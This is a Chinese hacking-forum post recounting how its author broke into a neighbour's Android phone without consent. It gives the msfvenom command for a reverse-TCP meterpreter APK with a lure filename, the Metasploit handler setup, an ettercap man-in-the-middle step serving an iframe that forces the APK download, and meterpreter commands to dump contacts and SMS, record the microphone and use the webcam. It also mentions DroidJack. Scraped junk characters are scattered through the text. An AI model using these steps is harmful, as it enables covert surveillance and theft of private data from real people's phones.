找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2306|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. ?0 d. d: a. c# F+ K4 w. P+ d 五、msf+ettercap入侵邻居安卓手机 3 E. q( a9 e. _

- j% l$ B$ P9 L# G+ e6 Z

2 g& K+ T3 Y$ G. R6 d 首先启动msf ! l4 ^9 |0 m+ a; x+ \+ G# C

' r F* q: K7 ^3 J, s

4 e& j) p- G# u: y: Q 先用kali生成一个安卓木马,如下命令: - a: U. ~" |! W1 U& B0 ~- `4 s

e9 k. T3 W) ]

% B4 C# P8 X3 p+ _0 b/ x Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ; F- Z( C4 V3 G, B5 S" T, R

( Q+ R4 A' U/ A( L% S5 Z

) Y# d' r! D( u 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 6 P k* R! }% T0 p9 ]! O, P

9 _4 d1 T8 o; @7 F1 O8 ~

' N' Z% l$ Y. e; U" e 然后进入msf : g# D4 l$ G o1 i: A

9 y, f; `$ C7 T3 A

+ g2 x0 j5 r6 E) U `, @ use exploit/multi/handler ; `- J# `0 Y; d

) x! |" Q5 W# b' E3 z w: X1 W

3 o! Z& E% [7 p6 Q% l set payload android/meterpreter/reverse_tcp 5 C! W# z! {0 h3 [2 {! L4 Q9 F

/ @8 n' ~4 `. n/ H5 n$ y% I

# S+ [/ j# w7 G! i0 | set LHOST 192.168.0.109 //ipkailiip : B4 `/ r, m( I3 Y: u

4 i1 N6 M4 p: p; \/ R5 I( v

9 C Z& I( U$ {- b* Z. v, x set LPORT 44444 //端口一定要与前面生成的木马的端口一致 . \3 l9 v% \% n u( K% ]7 ?# n

1 F% V2 A4 Y8 v, M! C( H

8 ?1 e3 t' ^- \6 N/ h6 C2 a Exploit - {/ v2 N8 N* ?$ b, J$ N

0 D5 q# N, Q) l& |- z4 a! s

7 i& I( b/ g6 h7 ?   8 w" V$ C* R( k+ _

: u- I6 `6 }! z

' ~! C! s+ ~# X 下面我们开启ettercap -G " S7 b. t* v) P8 R9 B. i) E

4 Z% c& W! \; E1 T1 C

4 q, d: V5 `0 w* F1 R 我物理IP 4 p, O) g4 E+ G6 B/ @) ?

5 A% X8 B$ s+ v0 K* N/ a$ A

6 k9 h2 T/ x/ z/ x; `   2 ]5 d& Y( c, ?( p0 W

/ L/ `5 p( @5 ~# x

( |, }7 z0 l l/ D1 o6 N 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ! X2 o _& p* g) C

( [8 k6 T( [# S( G4 a

2 O; o. M0 a+ u, D3 r P: [0 b 下面我们来设置一下 $ n& g: Y3 C* C9 ?7 d

: ^$ N- _1 |0 ^# ^/ U( f

( S8 p: T: o% s1 Z0 v2 M( `7 `   & W1 Q) q" s3 R( c) v1 h

: W* f; H. M! H! H5 J* c

! g4 Y7 _0 f5 W+ H: U S 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 8 k U) S0 h; Z' f

& i& U0 X$ e6 H h k1 L% A- q

8 U' N, g+ }9 P4 z Q- I- K: J   A! P; `2 X2 d0 A& W& N9 ?8 a

4 t* ~4 c% ?+ b+ B

9 h' w/ J8 n$ v. z( W$ z) s' E   0 x& t9 C: t3 _6 Q- V4 \: Z

7 `; p9 d6 `, h0 G

& N( K4 W1 }& @0 W1 B4 @   2 n3 J+ ]0 u4 B

. U7 T" J! @9 _' ?! ^2 j

" H2 y* k( Q2 A! O6 a+ k( k   - V2 j; \8 {% Q0 D( k7 F

) y# m y; U& q6 v9 P+ K

) {# e3 V7 A; ?   # G6 D2 l6 h+ G, D

8 ^- ]5 T' t# s# T' B

" r, t( @8 \/ M# N, P. |( F   , O( n+ x. b" M8 i/ g, T

4 `( S3 E, }& [) b- v" [

& E8 C- R( G4 O8 A9 s   8 y. ?5 ]! O! q3 {: x* g4 x

( ]! l1 y3 G8 ?8 S9 q l

( h; P0 D, J& n   0 l% M9 `7 `8 O8 n; p

- ~* E7 C3 ~6 l5 }0 R

" D9 J' P* O! e9 x! G7 J0 U   , v+ M3 D+ t! r6 ?# m8 D: }

# R3 j8 K( u5 M9 [4 x

! Y% f! \5 u0 Q8 m( J; F( H   4 i3 Z9 |3 v$ ]) T3 r1 d F: [9 z

* m* F1 h5 A- J# F0 ]8 T: T

9 D- B, X1 n1 ], {5 ?   8 _. Q$ C* G) v- d2 y6 o/ q$ m

# m; B3 R$ D/ h$ Z! B

2 ^. j# X0 U. F9 q   / r; V1 i8 V; n

& h, M6 l; _' E0 s% m

0 [. }3 M: D1 W' I6 g3 j( a9 f   8 Z6 p2 y! D1 P, s% W: [

( t3 b" D9 q! G

1 G# ] Z' G" E. B8 P; r 下面我们开始攻击 ' O7 ^( [$ X) g; g' H

& \" @1 p. e2 x/ H0 H

/ i. N4 _4 M; u5 @, B   : I ]0 k/ H7 H4 y% G

/ `( ^* j w4 X( j

X' ~% ^0 L# A/ v   ) V0 L+ G+ z) ?

F7 ]( \! d+ e5 e& j" U

# e% S. h0 d) l1 z7 |   , K) I. t1 c2 P/ u

. s: a* v0 Q- q, [9 }9 e1 G

% q. w! }+ A" O) A e1 p   ! {& _+ |' c4 v, m3 v

2 t) M: w+ D7 f6 A! r

# |. b; z; c- s) ]   & p/ v R, L( @2 j0 ~6 I

# R& p+ \6 g5 Q* {2 P9 h

1 T& y6 b1 r1 m' _ 大概过了5分钟多,发现反弹成功了 7 E0 X3 W- M( d) f J1 v6 I

4 l0 X* x O+ z# z

, ]$ q; L, B* S, i   9 u5 ]- u. M/ f' ]+ T" { q' ~3 u& J

( w( H5 ?! Q8 ^, d; w$ Y1 \

, E! v+ Q7 [4 o( l   * x+ [4 V. X; a1 e1 F

3 k. C0 y9 ^! Q6 p+ C7 V' ~

; `$ r6 k- A4 d7 g, H3 N( c   : |$ r7 \4 w0 L0 E" R7 |+ _2 |

: R& U! e+ e4 a

n+ ?6 N9 Y0 m   " F* U& u9 m* v/ J9 q3 Q7 {5 X

# G: m( m* I5 n8 R

0 J1 y( Z/ A( I4 J% y* p: I. _% Q   - k7 U* i! W$ `9 }& P

; r6 l2 @: L( U+ o5 r8 r; p9 A

0 z9 y1 M+ n; p3 c* `9 W   0 W0 M" f" ^0 p1 S1 i! C

( X1 E7 ^; t4 W8 o2 {6 k$ G

+ b/ L5 y: q# B6 }6 i   ; }$ H' n4 ~& J* g9 A& s2 {

* ` s& y/ B7 W" p

0 T3 |0 o' l5 V: {0 I0 s 执行命令 & }4 W" b9 ?+ D

4 Q' _/ l1 ~( t7 \; C& |

& b; T! q% o( d& v8 H6 d7 t1 u   * S( Z, r. J5 k+ c8 s

& L; l+ n$ G* l2 [1 j+ o4 f

# K9 E5 `9 S; W# \. _ dump_contacts    --》这个是导出电话 % \3 a1 b9 }" c! @ v) l; m8 B% C

+ N' v* @* W" M' d; w

1 S: `; S5 @% T# J# f dump_sms --》这个是导出信息 ) v/ \3 h4 @# a7 y- e

3 L( G5 X3 z, y

. A; {, r3 N4 W% W+ N record_mic     Record audio from the default microphone for X seconds 4 n2 B( i* ?# s4 O- @& l0 \

: y8 q, I4 R& @5 [

6 Y3 D1 q6 e3 p9 B$ ~) i0 n     webcam_chat    Start a video chat - a9 P" \4 {% @# t

+ _9 {4 y- W# R* c: q

1 ^/ l: y6 r! I     webcam_list    List webcams ) L8 m6 w0 l: @, \+ q1 L

$ U! s# i4 a3 f% n7 p0 v

# ?" @$ D- c6 c7 l% S     webcam_snap    Take a snapshot from the specified webcam - F2 I. O/ E5 o2 {

; i; j9 F( J. i0 w- _

* u' s9 L, _8 x1 d) O* C webcam_stream  lay a video stream from the specified webcam 4 h( u4 X* l( v M* b2 R0 o

. y% {6 Z% l" K; m G

" L: \6 X* y' X E" ?. [) ~& G   ! r6 [. [/ |6 V' c3 P

) Y5 X0 A+ F8 j: I0 h4 K

4 F, s/ {" Z! t2 M3 j T$ S   ) R5 K2 o K1 J2 l. x+ L

! n& Q8 K9 m/ T1 j/ G

! `( I2 i) O* y$ c" u7 D- {" `; M 我们打开看一下电话薄, 1 J7 v9 X) F- y$ A+ h X; x

" R' ~1 Q' y! X, `: H2 U

8 x: i( H) g: v/ ~9 w! g   1 ?4 w) j1 [! |8 j0 M9 r2 `2 r

* d2 |% N+ j1 M1 Q4 r% e

S5 M7 Q" Z: ^. ]; j   5 n$ j2 l8 ~5 G; N. g8 M

_7 m+ E0 L( x4 `$ u& d! H

! M# E3 W$ N" b$ O   ) ?0 Q8 e$ L" K0 F1 ]6 E

+ j; @0 s& s& r* e- q. |5 p% g8 n

! Z @: v+ E! [; i   * _, z, ^- W6 p6 N2 B

4 x6 a& y! q- `* u! W+ L

( Q" J. W: g, u% ~/ c5 L" G   4 }8 N, V; U0 s- b7 r; T" }. G

, y k3 r D7 e$ H8 d( q$ i

# e& i, o$ S7 y0 |   C+ ?8 E* D- J; ~. G/ r6 j% y

; f4 J* v1 h/ K, B

% H5 M: _) _( Y& _7 n2 X' W+ G; T 我们同时欺骗成DroidJack木马,使用方法如图: * Z. N; R3 T( F. t# I

1 {" _7 h% z) n2 x

- s0 Q; |, m X; W9 y- f% A6 N   ( \1 U0 Y. P t9 m8 w

0 f' {" C" A: Q, H

" A# o/ k9 X! ~' r1 |" Q   G" I2 ~6 J" m# q# g

" @8 M3 O4 u. E% E

; `6 r3 U) w8 s) v   $ M+ @4 P: }2 x) p0 `

' z9 H. T( O8 B! M; `7 O. i

1 T- ] E2 ^. F 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 0 O# ] t6 M. ]$ t5 C

. H" d+ z6 M( k

* i2 H0 H5 u' H& p% Z   . q, P5 Z) g$ [# f

$ W: P7 W% x' X5 B$ N( s

( r# z: a! T# e! ]/ i' \   0 h0 u1 ?! r6 a* ^% ^

2 }- D; ]; W4 ]0 @

1 X/ P8 i+ H' N7 o9 J( _   ( n. H& e3 Z" h$ Z$ z+ I* \# D" ~

# j9 F) v4 g! y

7 q" k1 G5 @6 V8 ?1 Y * V* l9 ?0 C. _, h! V5 v4 Q0 L

0 {. e. b& ]; i' e- R) o `6 G3 A

& X* O6 p% s% z2 T S) N
' d9 `/ E1 j3 A1 Z3 W b( ^5 l( K

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表